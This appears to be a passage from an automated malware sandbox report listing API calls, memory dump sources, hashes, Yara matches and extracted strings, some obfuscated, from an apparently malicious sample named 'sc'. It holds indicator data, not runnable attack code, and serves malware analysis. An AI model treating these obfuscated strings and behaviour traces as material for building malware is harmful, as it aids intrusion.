                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1be622d09a263530e4099143e077a01f79018be1e5a52f914f2fd7f363e502b
                                              • Instruction ID: 748f47a7b9d70b0fd568e33bbec2de4cbde520c032da486f3cdec2ef26b1e2e1
                                              • Opcode Fuzzy Hash: d1be622d09a263530e4099143e077a01f79018be1e5a52f914f2fd7f363e502b
                                              • Instruction Fuzzy Hash: 6790026131184807D140B5995C04607004597D0316F59C015A6064556E8B2A8D516135
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 21e79fc6babdebf98fc0e2ccf5e80f2ba24962216e1f80ad18d200e9ccf9c358
                                              • Instruction ID: 24ca78b1d31a6e9e37c8674a9b63d9524aed6ade0d7083858d04e5e6be49793b
                                              • Opcode Fuzzy Hash: 21e79fc6babdebf98fc0e2ccf5e80f2ba24962216e1f80ad18d200e9ccf9c358
                                              • Instruction Fuzzy Hash: 8490022171144906D101B1995804616004A97D0255F99C026A5024556ECB268A92A131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ecd5bc3eb6fb8326a7373d09e8c617ce10760db5e00d99a1237b2c4022456f78
                                              • Instruction ID: c253d7484745206b4c946d7f1eb7c1ee850703202794fee38cb7ea9daebe763f
                                              • Opcode Fuzzy Hash: ecd5bc3eb6fb8326a7373d09e8c617ce10760db5e00d99a1237b2c4022456f78
                                              • Instruction Fuzzy Hash: 2190022932344406D180B199680860A004597D1216F99D419A4015559CCA1689695321
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

APIs
• PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 02E1091D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: c23yo28O4$c23yo28O4
• API String ID: 1836367815-3151844675

Control-flow Graph

APIs
• PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 02E1091D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: c23yo28O4$c23yo28O4
• API String ID: 1836367815-3151844675
APIs
• Sleep.KERNELBASE(000007D0), ref: 02E22A9B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
• CoInitialize.OLE32(00000000), ref: 02E1EA57
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID: @J7<
• API String ID: 2538663250-2016760708
APIs
• CoInitialize.OLE32(00000000), ref: 02E1EA57
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID: @J7<
• API String ID: 2538663250-2016760708
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E142F2
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateProcessInternalW.KERNELBASE(?,?,?,?,02E17B73,00000010,?,?,?,00000044,?,00000010,02E17B73,?,?,?), ref: 02E28293
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E142F2
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E096F5
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E096F5
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,89881559,00000007,00000000,00000004,00000000,02E13B56,000000F4,?,?,?,?,?), ref: 02E281DC
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(02E114B9,?,02E248AF,02E114B9,02E244F7,02E248AF,?,02E114B9,02E244F7,00001000,?,?,02E29A53), ref: 02E2818F
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02E17BDC
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02E117A0,02E26C17,02E244F7,?), ref: 02E179F3
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,02E117A0,02E26C17,02E244F7,?), ref: 02E179F3
Memory Dump Source
• Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
• Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3540000_sc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                              • API String ID: 0-3558027158
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "/1($&3vr$'3~o$0wkr$2zg|$3vr~$505$$grs$$grs3$hz}o$krs4$kzgk$n"/1$n"/1$oqx3$osv|$osv|$q0gw$q0lv$s3~o$vpq0$v|~k$w~qx$xqz{$xz0~$z$i"$},$n$~kvp$~kvp$~oos$~xz0
                                              • API String ID: 0-3861810630
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              Strings
                                              • Execute=1, xrefs: 035E4713
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035E46FC
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035E4742
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035E4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 035E4787
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035E4725
                                              • ExecuteOptions, xrefs: 035E46A0
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035E02E7
                                              • RTL: Re-Waiting, xrefs: 035E031E
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035E02BD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              Strings
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035E7B7F
                                              • RTL: Re-Waiting, xrefs: 035E7BAC
                                              • RTL: Resource at %p, xrefs: 035E7B8E
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035E728C
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 035E72C1
                                              • RTL: Resource at %p, xrefs: 035E72A3
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035E7294
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 035FCFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              • API String ID: 4062629308-3101775584